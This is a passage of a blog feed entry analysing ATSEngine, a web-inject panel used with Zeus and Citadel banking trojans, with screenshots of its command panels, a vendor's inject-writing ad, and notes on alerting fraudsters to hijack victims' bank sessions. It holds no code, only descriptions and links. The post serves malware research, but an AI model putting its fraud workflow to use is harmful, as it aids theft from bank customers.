domain="http://www.blogger.com/atom/ns#">yummba</category><category domain="http://www.blogger.com/atom/ns#">ZeuS</category><title>ATSEngine</title><description>ATSEngine injects can be found oftenly inside Zeus configs, it makes the webinjects more dynamic because most of the content is located remotely and can be updated much easily instead of sending new config to all the bots.&lt;br /&gt;
It&#39;s the main difference with this, and a standard web inject inside Zeus.&lt;br /&gt;
One just allows you to do a static change in the page while the other gives you much more options, for example, customized webinjects, pop-ups, online requests for token etc...&lt;br /&gt;
ATSEngine have also a jabber alert feature, it let the fraudster know when the victim is logged
 to his bank account so it would be a god time to backconnect him (with the VNC feature of Zeus) and
 do the transaction.&lt;br /&gt;
Most of ATSEngine panels are also hosted on SSL because banks use SSL. &lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPhLmFFYYiVauEai3wB2OJKKdX3U24LaqWezrJvqxVt5XUsvsCTJ4JZnlXAwLNlF8u8-HYJBiWH2lEYmnBP7uf0wtFRGLcna-izJmsr9AoR6IwdsJwJSy8b1W7Yv4UMuJ_uJapljqTZ1M/s1600/2014-05-04_12-19-42.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPhLmFFYYiVauEai3wB2OJKKdX3U24LaqWezrJvqxVt5XUsvsCTJ4JZnlXAwLNlF8u8-HYJBiWH2lEYmnBP7uf0wtFRGLcna-izJmsr9AoR6IwdsJwJSy8b1W7Yv4UMuJ_uJapljqTZ1M/s1600/2014-05-04_12-19-42.png&quot; height=&quot;77&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
ATSEngine on a ZeusVM config.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0OSwWoloh7S6BPTKULZq51ZxklEkBpr9rviGatBabWcVvdbovbTTofdttIP6gXYoZ0Eu0HLA-dCnnk3AGxP4lhhIxQU2W-YH3p08EOU76WL-XXIEs4lgCsnHABEYSNsAsMCDkyFH_W5A/s1600/2014-05-04_12-25-03.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0OSwWoloh7S6BPTKULZq51ZxklEkBpr9rviGatBabWcVvdbovbTTofdttIP6gXYoZ0Eu0HLA-dCnnk3AGxP4lhhIxQU2W-YH3p08EOU76WL-XXIEs4lgCsnHABEYSNsAsMCDkyFH_W5A/s1600/2014-05-04_12-25-03.png&quot; height=&quot;103&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
ATSEngine on a Citadel config.&lt;br /&gt;
Example of &lt;a href=&quot;http://pastebin.com/MBw8HcCB&quot;&gt;figrabber.js&lt;/a&gt; from an ATSEngine panel.&lt;br /&gt;
&lt;br /&gt;
Some guys do also a business with this type of web injects, for example:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF0ILpLY9wIP5U7B5I5XjOu5CExSw8JbZM72h9vty_TqkCN4Saz6Wat2ZzotvN67jR4pSjYOprJbDVk4tbgDexmbIyzwUdyjP8rMhBpfndBFRs6LaNLUqJlJsOrazkgJQkTy-yn2kAiPc/s1600/02-01-2014+21-24-42.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF0ILpLY9wIP5U7B5I5XjOu5CExSw8JbZM72h9vty_TqkCN4Saz6Wat2ZzotvN67jR4pSjYOprJbDVk4tbgDexmbIyzwUdyjP8rMhBpfndBFRs6LaNLUqJlJsOrazkgJQkTy-yn2kAiPc/s400/02-01-2014+21-24-42.png&quot; height=&quot;398&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
He&#39;s offering a service for writing injects.&lt;br /&gt;
The title says &quot;Auto-uploads and Injects from professionals for professionals&quot;&lt;br /&gt;
The rest of the text explains how the service works, it&#39;s more a terms and conditions post rather than a technical description of the product, about moneyback, privacy, guarantees and other stuff.&lt;br /&gt;
They dont write mobile botnets, trojan horses, traffic direction systems or other malware software except injects, also they dont guarantee bypass of protection (like Rapport).&lt;br /&gt;
yummba is know anyway for writing injects for ATSEngine.&lt;br /&gt;
&lt;br /&gt;
Let&#39;s have a look on a C&amp;amp;C now..&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMUAdNIgrEQNpAYxpa3gjcJkqgYVtzFnSuty85BL8EyUQDqskRyfHIFgedC5cwQ-VSqqF2MNTfK0iZvwnGroUd_KuSF6Zl7K2PjsUYazcM1ClEWnVoC2EEpUeKxgxQpb8pqjT6VkUMpaI/s1600/R9e1D23.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMUAdNIgrEQNpAYxpa3gjcJkqgYVtzFnSuty85BL8EyUQDqskRyfHIFgedC5cwQ-VSqqF2MNTfK0iZvwnGroUd_KuSF6Zl7K2PjsUYazcM1ClEWnVoC2EEpUeKxgxQpb8pqjT6VkUMpaI/s1600/R9e1D23.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq6Sqk0w7-6dJbl7AG6U55skaiu92qoaKoDFT8Pfw6aAcfz0XpoF_HzY5398ddmC-6H-U4YwcfXfeh17vCNKYWw1u9zNX6zr_0zXW0bzwVKZj-CCydlXJW_0F_K2IndEzqjtoRZSaNvfQ/s1600/BqHPLni.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq6Sqk0w7-6dJbl7AG6U55skaiu92qoaKoDFT8Pfw6aAcfz0XpoF_HzY5398ddmC-6H-U4YwcfXfeh17vCNKYWw1u9zNX6zr_0zXW0bzwVKZj-CCydlXJW_0F_K2IndEzqjtoRZSaNvfQ/s1600/BqHPLni.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Accounts:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZVpC6UYtorJqLLG1icTy-OByWabQZo10EIcvmbK63rqtZsCmJKwWRdssGeqnz1DNgUzKozkAvwN6sDsGBBKrB7h3Wju98jcz759hM56khxe1PcI27V7kU23ZlozTq0M898VHrSVAMlng/s1600/02-01-2014+21-03-17.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZVpC6UYtorJqLLG1icTy-OByWabQZo10EIcvmbK63rqtZsCmJKwWRdssGeqnz1DNgUzKozkAvwN6sDsGBBKrB7h3Wju98jcz759hM56khxe1PcI27V7kU23ZlozTq0M898VHrSVAMlng/s400/02-01-2014+21-03-17.png&quot; height=&quot;317&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Reports:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjpestNbojwrxba_9ZnuecB3yQ40rBTEvaSX0wz1UJU27FXO7WeFT7DR9_kcoJ2eSLBKp67tEakO2pyYxIlV591K6-TGHWE9kbBYaTQZFd9PvecBpxdlvXDDehdrXXKyaab3MrRiCPkdc/s1600/02-01-2014+21-13-52.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjpestNbojwrxba_9ZnuecB3yQ40rBTEvaSX0wz1UJU27FXO7WeFT7DR9_kcoJ2eSLBKp67tEakO2pyYxIlV591K6-TGHWE9kbBYaTQZFd9PvecBpxdlvXDDehdrXXKyaab3MrRiCPkdc/s400/02-01-2014+21-13-52.png&quot; height=&quot;317&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Options main:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgic_Fv_6zr7gaI10mRq4ymqi8kLNMyE51WH8S7jPL3mt6H1dkllzAvykJBCE6jDboNdMaKjhxCiAucl4vpb5CGhxE6C3KNrpkrEuXKSoV5HDxhdhL2wemZn0wWkkozzASG3LFu1A46le8/s1600/02-01-2014+21-21-25.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgic_Fv_6zr7gaI10mRq4ymqi8kLNMyE51WH8S7jPL3mt6H1dkllzAvykJBCE6jDboNdMaKjhxCiAucl4vpb5CGhxE6C3KNrpkrEuXKSoV5HDxhdhL2wemZn0wWkkozzASG3LFu1A46le8/s400/02-01-2014+21-21-25.png&quot; height=&quot;331&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Options Jabber:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQjyTE8DX0Jdnqf5VSU3ah1NUj9IKBgTtycNlbkmttRwaWBDq8UhH4QepfE4OJjDo6lkHeXOcd4z2agrT9ITTvoqhA1ZTcTqRqP9hiw4TCCdTOzLPwl33klaquCOwkgYrD0_5TL5JaYX4/s1600/02-01-2014+21-22-25.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQjyTE8DX0Jdnqf5VSU3ah1NUj9IKBgTtycNlbkmttRwaWBDq8UhH4QepfE4OJjDo6lkHeXOcd4z2agrT9ITTvoqhA1ZTcTqRqP9hiw4TCCdTOzLPwl33klaquCOwkgYrD0_5TL5JaYX4/s400/02-01-2014+21-22-25.png&quot; height=&quot;331&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Another panel, on SSL:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNF8-ZsfhEOpn6irpZ3hUDTeNfN7T_zZrUBqKoSpxfvu8ywr3uH0vx4H81_WZwoP1UJJy1nBGn4gStUTkdtwKWAvQWyBF2RU5EzZEvR54Nhmga1PNEr2oMMOn0njZvWt70GPciDtrLeIk/s1600/09-01-2014+00-33-21.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNF8-ZsfhEOpn6irpZ3hUDTeNfN7T_zZrUBqKoSpxfvu8ywr3uH0vx4H81_WZwoP1UJJy1nBGn4gStUTkdtwKWAvQWyBF2RU5EzZEvR54Nhmga1PNEr2oMMOn0njZvWt70GPciDtrLeIk/s1600/09-01-2014+00-33-21.png&quot; height=&quot;186&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkkhUoLv2SZI9AH3e7aSe0NaV8QThFhbFRIyO_XfG-Rv_kNGRWj6HbpmxZSML12utTdKZaEC0wON3QZNOCw4kUbZo0OoTRbYFKFFKB1uqyUYFxNb8XlwfRyq0JZYmOoNxeTj3WV4zUOKU/s1600/09-01-2014+00-32-44.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkkhUoLv2SZI9AH3e7aSe0NaV8QThFhbFRIyO_XfG-Rv_kNGRWj6HbpmxZSML12utTdKZaEC0wON3QZNOCw4kUbZo0OoTRbYFKFFKB1uqyUYFxNb8XlwfRyq0JZYmOoNxeTj3WV4zUOKU/s1600/09-01-2014+00-32-44.png&quot; height=&quot;245&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1ocJ8q363R_IqZuzA_49hYRZ9ufZe6ZFhSWQNUMx8llrxMr_0xfeteva5JrPFk3ap0MD2Xi1ppbijFDQ5rA-MiSgyRjjtR714WVSrZpvr_sgdTc7cpdldJeHV9KXhyphenhyphengq30-G5IQb3HyA/s1600/09-01-2014+00-33-49.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1ocJ8q363R_IqZuzA_49hYRZ9ufZe6ZFhSWQNUMx8llrxMr_0xfeteva5JrPFk3ap0MD2Xi1ppbijFDQ5rA-MiSgyRjjtR714WVSrZpvr_sgdTc7cpdldJeHV9KXhyphenhyphengq30-G5IQb3HyA/s1600/09-01-2014+00-33-49.png&quot; height=&quot;331&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Another panel, on SSL:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKdo-q2MdiT1QmJW7OKWvokCo9oUH5XCdDZhruzUDxJ2ugT9he18KIsbQNZpZ08j9vXNm1vU3CYUz1HOcQMNmY_h-fgVfks1l9_10aCS_2dZu7hvRhJqVrMTN-HpBA_d8F-POHxwfS-2s/s1600/22-01-2014+14-18-52.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKdo-q2MdiT1QmJW7OKWvokCo9oUH5XCdDZhruzUDxJ2ugT9he18KIsbQNZpZ08j9vXNm1vU3CYUz1HOcQMNmY_h-fgVfks1l9_10aCS_2dZu7hvRhJqVrMTN-HpBA_d8F-POHxwfS-2s/s1600/22-01-2014+14-18-52.png&quot; height=&quot;130&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Another panel, still on SSL:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwre1W9j3zRjrEa1h1FVAY016IWMcb8GO98T3du3H8JtZCM-E-srmol1u-PcQ_Zza0_GspBtI538tlXL5kj_5gS40zCjp2_SLHdmtJCSgJpgWjudEDTCJZFyOj4MYC_4BhtyqhB0qsaIQ/s1600/20-02-2014+15-02-46.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwre1W9j3zRjrEa1h1FVAY016IWMcb8GO98T3du3H8JtZCM-E-srmol1u-PcQ_Zza0_GspBtI538tlXL5kj_5gS40zCjp2_SLHdmtJCSgJpgWjudEDTCJZFyOj4MYC_4BhtyqhB0qsaIQ/s1600/20-02-2014+15-02-46.png&quot; height=&quot;140&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Details:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDRQj1bykRPEsp1R6DkxBzMc4k-MjEf3WGMTE3VMulyiZ1Gvga5nxX-_wqlVx0CDDuErlyU-7wKeUt7BHk3Flp0EtmPC8tbgjWNSFq7zUd8lBCU-wVwG1WLzL7s7kAQHwP_GCgz4ZTFgo/s1600/20-02-2014+15-28-51.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDRQj1bykRPEsp1R6DkxBzMc4k-MjEf3WGMTE3VMulyiZ1Gvga5nxX-_wqlVx0CDDuErlyU-7wKeUt7BHk3Flp0EtmPC8tbgjWNSFq7zUd8lBCU-wVwG1WLzL7s7kAQHwP_GCgz4ZTFgo/s1600/20-02-2014+15-28-51.png&quot; height=&quot;347&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Additional fields rules:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVg8dizbvsDCs4T7Ihvgrvcu-L29pqM1mntbFhf5VbFLi090_gkITNh683QN_xol0lFa1w9oRABdG3LvwXgDKckfW_ssMmpu32bc3rwMmas1ry_GgKtm0S4Q_y4-ULVGV3XaszggJaaRQ/s1600/20-02-2014+15-06-26.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVg8dizbvsDCs4T7Ihvgrvcu-L29pqM1mntbFhf5VbFLi090_gkITNh683QN_xol0lFa1w9oRABdG3LvwXgDKckfW_ssMmpu32bc3rwMmas1ry_GgKtm0S4Q_y4-ULVGV3XaszggJaaRQ/s1600/20-02-2014+15-06-26.png&quot; height=&quot;237&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Additionnal fields rules (texts):&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfxtwWV0ngx54pgUU0ujehZhxT2De6KNubcrbo_GlDcpYDK0AdGVOp2kLnkRIMfx7AWogyuglUoTqMHIWiigeGcF2JxPoikDch7uMXw2e7Q0z_r_lz0AWsfHuorTCk_zJekXbUNi1xMgM/s1600/20-02-2014+15-07-25.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfxtwWV0ngx54pgUU0ujehZhxT2De6KNubcrbo_GlDcpYDK0AdGVOp2kLnkRIMfx7AWogyuglUoTqMHIWiigeGcF2JxPoikDch7uMXw2e7Q0z_r_lz0AWsfHuorTCk_zJekXbUNi1xMgM/s1600/20-02-2014+15-07-25.png&quot; height=&quot;251&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Edit rule:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5AafSGYMJS4tZWPLWHIz9IK-36Ig3WQCOj0nPYSuE7S6Xv-pET-6Me-x0-tp7B7-V0bK-GO3yzkKDqKu1_MVGTalomrl9R9M-sVBL0Zsl21FhAV3LXF3dQJEfQDU0yp4udZ4xkZHwWrM/s1600/20-02-2014+15-20-15.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5AafSGYMJS4tZWPLWHIz9IK-36Ig3WQCOj0nPYSuE7S6Xv-pET-6Me-x0-tp7B7-V0bK-GO3yzkKDqKu1_MVGTalomrl9R9M-sVBL0Zsl21FhAV3LXF3dQJEfQDU0yp4udZ4xkZHwWrM/s1600/20-02-2014+15-20-15.png&quot; height=&quot;233&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Edit text:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD0PftmHUUdEOdOm2vM-l7gXWnqQb0jhIVM5juuwUOnwx6_7Ajq-n3IrNGYbueoiPPN14UPV0pXN8pRCojomZnL50Yqskq0Odcl30gmhzBE_nTUm0itIKTI4p1kyvIVWKZ4nOBo-5i77s/s1600/20-02-2014+15-18-21.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD0PftmHUUdEOdOm2vM-l7gXWnqQb0jhIVM5juuwUOnwx6_7Ajq-n3IrNGYbueoiPPN14UPV0pXN8pRCojomZnL50Yqskq0Odcl30gmhzBE_nTUm0itIKTI4p1kyvIVWKZ4nOBo-5i77s/s1600/20-02-2014+15-18-21.png&quot; height=&quot;262&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
VBV/MCSC rules:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsOBxcQD4K787WVt25rfs1bcigdo08NUVwa6XbzqeM58_z9jpDbZXnxvi2_Bh32Y0c7ivdgx-6vXUQ3xOycJn3IjRhkmU3j88vdn00NXId1dexQH1OqmslCQVY9sb0FwxK0A1B9JXUSic/s1600/20-02-2014+15-08-30.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsOBxcQD4K787WVt25rfs1bcigdo08NUVwa6XbzqeM58_z9jpDbZXnxvi2_Bh32Y0c7ivdgx-6vXUQ3xOycJn3IjRhkmU3j88vdn00NXId1dexQH1OqmslCQVY9sb0FwxK0A1B9JXUSic/s1600/20-02-2014+15-08-30.png&quot; height=&quot;116&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Add a rule:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_CaZPobkMaxCFwtrH6ks9kBe_aCn3pJDjdTpyqlwZrZzajwAwALtdonse6GuNOdRUT-kButWpF7UB62ZvsgHPiyyKHKUxV-GInRNqFptEc6jELdkGTstoWV2BJ660ACHCAcnFw6nx0O4/s1600/20-02-2014+15-16-42.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_CaZPobkMaxCFwtrH6ks9kBe_aCn3pJDjdTpyqlwZrZzajwAwALtdonse6GuNOdRUT-kButWpF7UB62ZvsgHPiyyKHKUxV-GInRNqFptEc6jELdkGTstoWV2BJ660ACHCAcnFw6nx0O4/s1600/20-02-2014+15-16-42.png&quot; height=&quot;233&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Options:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPc8Hp1rzRE_Xelpu0EfhnDV7XUtj1oFC09B9O2FKZ5rK6cdu97v2loNk-bSM1wGcgic_UXOObjIqk0UmeVC_LkIMb3PVEPMgDlEkaXlr_E_gVLJSTuKhrPK9armGH9_YpEb-gkGpGNlc/s1600/20-02-2014+15-11-02.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPc8Hp1rzRE_Xelpu0EfhnDV7XUtj1oFC09B9O2FKZ5rK6cdu97v2loNk-bSM1wGcgic_UXOObjIqk0UmeVC_LkIMb3PVEPMgDlEkaXlr_E_gVLJSTuKhrPK9armGH9_YpEb-gkGpGNlc/s1600/20-02-2014+15-11-02.png&quot; height=&quot;342&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Options (CC Checker):&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEP8945GEDUnizLdpQYMqdkbUeTeliWYN3-wMcd4yCQHiQL3EBX10ALKUGtyFVcDMUBfQMWobE_8ZTpCKIMonYa79948_lZzAVK7ou70NqQL22TV56fH4e-jtWuXYxdtHkBE8CfmaF0FE/s1600/20-02-2014+15-12-23.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEP8945GEDUnizLdpQYMqdkbUeTeliWYN3-wMcd4yCQHiQL3EBX10ALKUGtyFVcDMUBfQMWobE_8ZTpCKIMonYa79948_lZzAVK7ou70NqQL22TV56fH4e-jtWuXYxdtHkBE8CfmaF0FE/s1600/20-02-2014+15-12-23.png&quot; height=&quot;341&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Files, dumped from another panel, targeting La banque Postal (a French bank):&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF3rrEh_OaN1F6grGTp8eCP0DjAwkUtt4By311QRKfMe-cSOLRnba38YTcAggt3eSPFNOIECRp3NVN8wFfqZtnHvE5gkRgy94hyphenhyphen2Geoy6X0SSfv1n27NvsRsNQ5VVFD_p7Kl9gKSMNHSA/s1600/02-01-2014+21-36-38.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF3rrEh_OaN1F6grGTp8eCP0DjAwkUtt4By311QRKfMe-cSOLRnba38YTcAggt3eSPFNOIECRp3NVN8wFfqZtnHvE5gkRgy94hyphenhyphen2Geoy6X0SSfv1n27NvsRsNQ5VVFD_p7Kl9gKSMNHSA/s1600/02-01-2014+21-36-38.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
